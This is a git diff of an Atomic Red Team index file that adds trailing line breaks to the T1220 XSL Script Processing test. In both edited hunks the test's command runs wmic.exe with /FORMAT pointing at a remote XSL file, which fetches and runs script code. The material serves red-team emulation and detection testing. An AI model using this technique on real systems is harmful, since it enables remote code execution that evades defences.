diff --git a/atomics/index.yaml b/atomics/index.yaml index 74172f05..183f17bc 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -8681,7 +8681,9 @@ defense-evasion: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl executor: name: command_prompt - command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}' + command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file} + +' privilege-escalation: T1134: technique: @@ -16390,7 +16392,9 @@ execution: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmic-script.xsl executor: name: command_prompt - command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}' + command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file} + +' lateral-movement: T1155: technique: